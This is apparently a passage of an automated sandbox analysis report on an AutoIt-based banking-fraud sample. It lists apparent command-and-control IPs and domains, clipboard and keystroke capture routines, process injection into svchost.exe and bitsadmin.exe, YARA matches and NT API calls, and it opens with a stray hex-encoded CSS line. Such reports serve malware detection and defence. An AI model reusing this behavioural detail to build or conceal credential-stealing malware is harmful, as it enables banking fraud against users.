63 6f 6c 6f 72 3a 20 23 35 64 35 64 35 64 3b 0a 09 09 09 09 6c 65 74 74 65 72 2d 73 70 61 63 69 6e 67 3a 20 2d 30 2e 30 32 65 6d 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 33 30 70 78 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 33 30 70 78 3b 0a 09 09 09 7d 0a 0a 09 09 09 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 09 09 09 09 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 61 75 74 6f 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 3b 0a 09 09 09 7d 0a 0a 09 09 09 2e 61 6e 69 6d 61 74 65 5f 5f 61 6e 69 6d 61 74 65 64 20 7b 0a 09 09 09 09 61 6e 69 6d 61 74 69 6f 6e 2d 64 75 72 61 74 69 6f 6e 3a 20 31 73 3b 0a 09 09 09 09 61 6e 69 6d 61 74 69 6f 6e 2d 66 69 6c 6c 2d 6d 6f 64 65 3a 20 62 6f 74 68 3b 0a 09 09 09 7d 0a 0a 09 09 09 2e 61 6e 69 6d 61 74 65 5f 5f 66 61 64 65 49 6e 20 7b 0a 09 09 09 09 61 6e 69 6d 61 74 69 6f 6e 2d 6e 61 6d 6
                Source: uG3I84bQEr.exe, 00000000.00000002.2247618432.0000000000DAC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://18.141.10.107/
                Source: uG3I84bQEr.exe, 00000000.00000002.2247618432.0000000000DAC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://18.141.10.107/(
                Source: uG3I84bQEr.exe, 00000000.00000002.2247919314.0000000000E33000.00000004.00000020.00020000.00000000.sdmp, uG3I84bQEr.exe, 00000000.00000002.2247618432.0000000000D48000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://18.141.10.107/dwlowhbefckeyd
                Source: uG3I84bQEr.exe, 00000000.00000002.2247919314.0000000000E33000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://18.141.10.107/dwlowhbefckeydsA
                Source: uG3I84bQEr.exe, 00000000.00000002.2247618432.0000000000D48000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://18.141.10.107/dwlowhbefckeydx
                Source: uG3I84bQEr.exe, 00000000.00000002.2247618432.0000000000DAC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://18.141.10.107:80/dwlowhbefckeyd
                Source: uG3I84bQEr.exe, 00000000.00000002.2247919314.0000000000E33000.00000004.00000020.00020000.00000000.sdmp, uG3I84bQEr.exe, 00000000.00000002.2247618432.0000000000DAC000.00000004.00000020.00020000.00000000.sdmp, uG3I84bQEr.exe, 00000000.00000002.2247618432.0000000000D48000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://54.244.188.177/
                Source: uG3I84bQEr.exe, 00000000.00000002.2247618432.0000000000D48000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pywolwnvd.biz/
                Source: svchost.exe, 00000003.00000003.2473240347.0000000002A48000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.2473112981.0000000002A1A000.00000004.00000020.00020000.00000000.sdmp, bGPwjAWMEtES.exe, 00000006.00000003.2585902954.000000000120F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://server/get.asp
                Source: bGPwjAWMEtES.exe, 00000006.00000002.3480937676.000000000950A000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.soainsaat.xyz
                Source: bGPwjAWMEtES.exe, 00000006.00000002.3480937676.000000000950A000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.soainsaat.xyz/rum2/
                Source: bitsadmin.exe, 00000007.00000002.3474681876.0000000007AC8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                Source: bitsadmin.exe, 00000007.00000002.3474681876.0000000007AC8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: bitsadmin.exe, 00000007.00000002.3474681876.0000000007AC8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                Source: bitsadmin.exe, 00000007.00000002.3474681876.0000000007AC8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: bGPwjAWMEtES.exe, 00000006.00000002.3479790735.00000000075F6000.00000004.80000000.00040000.00000000.sdmp, bitsadmin.exe, 00000007.00000002.3473009686.0000000003E06000.00000004.10000000.00040000.00000000.sdmp, bitsadmin.exe, 00000007.00000002.3474501511.0000000006020000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://down-sz.trafficmanager.net/?hh=
                Source: bitsadmin.exe, 00000007.00000002.3474681876.0000000007AC8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: bitsadmin.exe, 00000007.00000002.3474681876.0000000007AC8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                Source: bitsadmin.exe, 00000007.00000002.3474681876.0000000007AC8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: bitsadmin.exe, 00000007.00000002.3470880703.0000000002E24000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
                Source: bitsadmin.exe, 00000007.00000003.2701406497.0000000007AA5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srfhttps://login.
                Source: bitsadmin.exe, 00000007.00000002.3470880703.0000000002E24000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2)
                Source: bitsadmin.exe, 00000007.00000002.3470880703.0000000002E24000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
                Source: bitsadmin.exe, 00000007.00000002.3470880703.0000000002E24000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
                Source: bitsadmin.exe, 00000007.00000002.3470880703.0000000002E24000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
                Source: bitsadmin.exe, 00000007.00000002.3470880703.0000000002E52000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
                Source: bitsadmin.exe, 00000007.00000002.3474681876.0000000007AC8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                Source: C:\Users\user\Desktop\uG3I84bQEr.exeCode function: 0_2_00474164 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_00474164
                Source: C:\Users\user\Desktop\uG3I84bQEr.exeCode function: 0_2_00474164 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_00474164
                Source: C:\Users\user\Desktop\uG3I84bQEr.exeCode function: 0_2_00473F66 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_00473F66
                Source: C:\Users\user\Desktop\uG3I84bQEr.exeCode function: 0_2_0046001C GetKeyboardState,SetKeyboardState,GetAsyncKeyState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,0_2_0046001C
                Source: C:\Users\user\Desktop\uG3I84bQEr.exeCode function: 0_2_0048CABC DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,0_2_0048CABC

                E-Banking Fraud

                barindex
                Source: Yara matchFile source: 3.2.svchost.exe.500000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.2.svchost.exe.500000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000007.00000002.3471913898.0000000003000000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.2505596273.0000000000500000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.2505839285.00000000029A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.3472823887.0000000005F10000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.2506486835.0000000006550000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.3471962975.0000000003050000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.3470661135.0000000002920000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY

                System Summary

                barindex
                Source: C:\Users\user\Desktop\uG3I84bQEr.exeCode function: This is a third-party compiled AutoIt script.0_2_00403B3A
                Source: uG3I84bQEr.exeString found in binary or memory: This is a third-party compiled AutoIt script.
                Source: uG3I84bQEr.exe, 00000000.00000000.2219681547.00000000004B4000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_351af87c-1
                Source: uG3I84bQEr.exe, 00000000.00000000.2219681547.00000000004B4000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`memstr_b88205ce-b
                Source: uG3I84bQEr.exeString found in binary or memory: This is a third-party compiled AutoIt script.memstr_fd1f02c3-f
                Source: uG3I84bQEr.exeString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`memstr_689389cf-c
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0052CA93 NtClose,3_2_0052CA93
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03072B60 NtClose,LdrInitializeThunk,3_2_03072B60
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03072DF0 NtQuerySystemInformation,LdrInitializeThunk,3_2_03072DF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030735C0 NtCreateMutant,LdrInitializeThunk,3_2_030735C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03074340 NtSetContextThread,3_2_03074340
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03074650 NtSuspendThread,3_2_03074650
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03072B80 NtQueryInformationFile,3_2_03072B80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03072BA0 NtEnumerateValueKey,3_2_03072BA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03072BE0 NtQueryValueKey,3_2_03072BE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03072BF0 NtAllocateVirtualMemory,3_2_03072BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03072AB0 NtWaitForSingleObject,3_2_03072AB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03072AD0 NtReadFile,3_2_03072AD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03072AF0 NtWriteFile,3_2_03072AF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03072F30 NtCreateSection,3_2_03072F30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03072F60 NtCreateProcessEx,3_2_03072F60
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03072F90 NtProtectVirtualMemory,3_2_03072F90
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03072FA0 NtQuerySection,3_2_03072FA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03072FB0 NtResumeThread,3_2_03072FB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03072FE0 NtCreateFile,3_2_03072FE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03072E30 NtWriteVirtualMemory,3_2_03072E30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03072E80 NtReadVirtualMemory,3_2_03072E80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03072EA0 NtAdjustPrivilegesToken,3_2_03072EA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03072EE0 NtQueueApcThread,3_2_03072EE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03072D00 NtSetInformationFile,3_2_03072D00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03072D10 NtMapViewOfSection,3_2_03072D10
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03072D30 NtUnmapViewOfSection,3_2_03072D30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03072DB0 NtEnumerateKey,3_2_03072DB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03072DD0 NtDelayExecution,3_2_03072DD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03072C00 NtQueryInformationProcess,3_2_03072C00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03072C60 NtCreateKey,3_2_03072C60
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03072C70 NtFreeVirtualMemory,3_2_03072C70
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03072CA0 NtQueryInformationToken,3_2_03072CA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03072CC0 NtQueryVirtualMemory,3_2_03072CC0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03072CF0 NtOpenProcess,3_2_03072CF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03073010 NtOpenDirectoryObject,3_2_03073010
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03073090 NtSetValueKey,3_2_03073090
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030739B0 NtGetContextThread,3_2_030739B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03073D10 NtOpenProcessToken,3_2_03073D10
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03073D70 NtOpenThread,3_2_03073D70
                Source: C:\Users\user\Desktop\uG3I84bQEr.exeCode function: 0_2_0046A1EF: GetFullPathNameW,__swprintf,CreateDirectoryW,CreateFileW,_memset,_wcsncpy,DeviceIoControl,CloseHandle,RemoveDirectoryW,CloseHandle,0_2_0046A1EF
                Source: C:\Users\user\Desktop\uG3I84bQEr.exeCode function: 0_2_00458310 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,0_2_00458310
                Source: C:\Users\user\Desktop\uG3I84bQEr.exeCode function: 0_2_004651BD ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,0_2_004651BD
                Source: C:\Users\user\Desktop\uG3I84bQEr.exeCode function: 0_2_0040E6A00_2_0040E6A0
                Source: C:\Users\user\Desktop\uG3I84bQEr.exeCode function: 0_2_0042D9750_2_0042D975
                Source: C:\Users\user\Desktop\uG3I84bQEr.exeCode function: 0_2_0040FCE00_2_0040FCE0
                Source: C:\Users\user\Desktop\uG3I84bQEr.exeCode function: 0_2_004221C50_2_004221C5
                Source: C:\Users\user\Desktop\uG3I84bQEr.exeCode function: 0_2_004362D20_2_004362D2
                Source: C:\Users\user\Desktop\uG3I84bQEr.exeCode function: 0_2_004803DA0_2_004803DA
                Source: C:\Users\user\Desktop\uG3I84bQEr.exeCode function: 0_2_0043242E0_2_0043242E
                Source: C:\Users\user\Desktop\uG3I84bQEr.exeCode function: 0_2_004225FA0_2_004225FA
                Source: C:\Users\user\Desktop\uG3I84bQEr.exeCode function: 0_2_0045E6160_2_0045E616
                Source: C:\Users\user\Desktop\uG3I84bQEr.exeCode function: 0_2_004166E10_2_004166E1
                Source: C:\Users\user\Desktop\uG3I84bQEr.exeCode function: 0_2_0043878F0_2_0043878F
                Source: C:\Users\user\Desktop\uG3I84bQEr.exeCode function: 0_2_004368440_2_00436844
                Source: C:\Users\user\Desktop\uG3I84bQEr.exeCode function: 0_2_004808570_2_00480857
                Source: C:\Users\user\Desktop\uG3I84bQEr.exeCode function: 0_2_004188080_2_00418808
                Source: C:\Users\user\Desktop\uG3I84bQEr.exeCode function: 0_2_004688890_2_00468889
                Source: C:\Users\user\Desktop\uG3I84bQEr.exeCode function: 0_2_0042CB210_2_0042CB21
                Source: C:\Users\user\Desktop\uG3I84bQEr.exeCode function: 0_2_00436DB60_2_00436DB6
                Source: C:\Users\user\Desktop\uG3I84bQEr.exeCode function: 0_2_00416F9E0_2_00416F9E
                Source: C:\Users\user\Desktop\uG3I84bQEr.exeCode function: 0_2_004130300_2_00413030
                Source: C:\Users\user\Desktop\uG3I84bQEr.exeCode function: 0_2_0042F1D90_2_0042F1D9
                Source: C:\Users\user\Desktop\uG3I84bQEr.exeCode function: 0_2_004231870_2_00423187
                Source: C:\Users\user\Desktop\uG3I84bQEr.exeCode function: 0_2_004012870_2_00401287
                Source: C:\Users\user\Desktop\uG3I84bQEr.exeCode function: 0_2_004214840_2_00421484
                Source: C:\Users\user\Desktop\uG3I84bQEr.exeCode function: 0_2_004155200_2_00415520
                Source: C:\Users\user\Desktop\uG3I84bQEr.exeCode function: 0_2_004276960_2_00427696
                Source: C:\Users\user\Desktop\uG3I84bQEr.exeCode function: 0_2_004157600_2_00415760
                Source: C:\Users\user\Desktop\uG3I84bQEr.exeCode function: 0_2_004219780_2_00421978
                Source: C:\Users\user\Desktop\uG3I84bQEr.exeCode function: 0_2_00439AB50_2_00439AB5
                Source: C:\Users\user\Desktop\uG3I84bQEr.exeCode function: 0_2_0051FCC80_2_0051FCC8
                Source: C:\Users\user\Desktop\uG3I84bQEr.exeCode function: 0_2_00487DDB0_2_00487DDB
                Source: C:\Users\user\Desktop\uG3I84bQEr.exeCode function: 0_2_00421D900_2_00421D90
                Source: C:\Users\user\Desktop\uG3I84bQEr.exeCode function: 0_2_0042BDA60_2_0042BDA6
                Source: C:\Users\user\Desktop\uG3I84bQEr.exeCode function: 0_2_0040DF000_2_0040DF00
                Source: C:\Users\user\Desktop\uG3I84bQEr.exeCode function: 0_2_00413FE00_2_00413FE0
                Source: C:\Users\user\Desktop\uG3I84bQEr.exeCode function: 0_2_00B900D90_2_00B900D9
                Source: C:\Users\user\Desktop\uG3I84bQEr.exeCode function: 0_2_00B56EAF0_2_00B56EAF
                Source: C:\Users\user\Desktop\uG3I84bQEr.exeCode function: 0_2_00B551EE0_2_00B551EE
                Source: C:\Users\user\Desktop\uG3I84bQEr.exeCode function: 0_2_00B9515C0_2_00B9515C
                Source: C:\Users\user\Desktop\uG3I84bQEr.exeCode function: 0_2_00B8D5800_2_00B8D580
                Source: C:\Users\user\Desktop\uG3I84bQEr.exeCode function: 0_2_00B837800_2_00B83780
                Source: C:\Users\user\Desktop\uG3I84bQEr.exeCode function: 0_2_00B8C7F00_2_00B8C7F0
                Source: C:\Users\user\Desktop\uG3I84bQEr.exeCode function: 0_2_00B939A30_2_00B939A3
                Source: C:\Users\user\Desktop\uG3I84bQEr.exeCode function: 0_2_00B859800_2_00B85980
                Source: C:\Users\user\Desktop\uG3I84bQEr.exeCode function: 0_2_00B57B710_2_00B57B71
                Source: C:\Users\user\Desktop\uG3I84bQEr.exeCode function: 0_2_00B57F800_2_00B57F80
                Source: C:\Users\user\Desktop\uG3I84bQEr.exeCode function: 0_2_00DDA0080_2_00DDA008
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_005189933_2_00518993
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_00501ACB3_2_00501ACB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0052F0B33_2_0052F0B3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_005101D33_2_005101D3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_005032F03_2_005032F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_00502A903_2_00502A90
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0050E3D33_2_0050E3D3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_005103F33_2_005103F3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_00516B933_2_00516B93
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_00516B8E3_2_00516B8E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_00501C403_2_00501C40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_00501C3A3_2_00501C3A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0050E51C3_2_0050E51C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0050E5233_2_0050E523
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_00502E503_2_00502E50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_00502E493_2_00502E49
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_00502F193_2_00502F19
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_005027203_2_00502720
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030FA3523_2_030FA352
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0304E3F03_2_0304E3F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_031003E63_2_031003E6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030E02743_2_030E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030C02C03_2_030C02C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030301003_2_03030100
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030DA1183_2_030DA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030C81583_2_030C8158
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030F41A23_2_030F41A2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_031001AA3_2_031001AA
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030F81CC3_2_030F81CC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030D20003_2_030D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030647503_2_03064750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030407703_2_03040770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0303C7C03_2_0303C7C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0305C6E03_2_0305C6E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030405353_2_03040535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_031005913_2_03100591
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030E44203_2_030E4420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030F24463_2_030F2446
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030EE4F63_2_030EE4F6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030FAB403_2_030FAB40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030F6BD73_2_030F6BD7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0303EA803_2_0303EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030569623_2_03056962
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030429A03_2_030429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0310A9A63_2_0310A9A6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0304A8403_2_0304A840
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030428403_2_03042840
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030268B83_2_030268B8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0306E8F03_2_0306E8F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03082F283_2_03082F28
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03060F303_2_03060F30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030E2F303_2_030E2F30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030B4F403_2_030B4F40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030BEFA03_2_030BEFA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03032FC83_2_03032FC8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0304CFE03_2_0304CFE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030FEE263_2_030FEE26
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03040E593_2_03040E59
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03052E903_2_03052E90
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030FCE933_2_030FCE93
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030FEEDB3_2_030FEEDB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0304AD003_2_0304AD00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030DCD1F3_2_030DCD1F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03058DBF3_2_03058DBF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0303ADE03_2_0303ADE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03040C003_2_03040C00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030E0CB53_2_030E0CB5
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03030CF23_2_03030CF2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030F132D3_2_030F132D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0302D34C3_2_0302D34C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0308739A3_2_0308739A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030452A03_2_030452A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0305B2C03_2_0305B2C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030E12ED3_2_030E12ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0307516C3_2_0307516C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0302F1723_2_0302F172
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0310B16B3_2_0310B16B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0304B1B03_2_0304B1B0
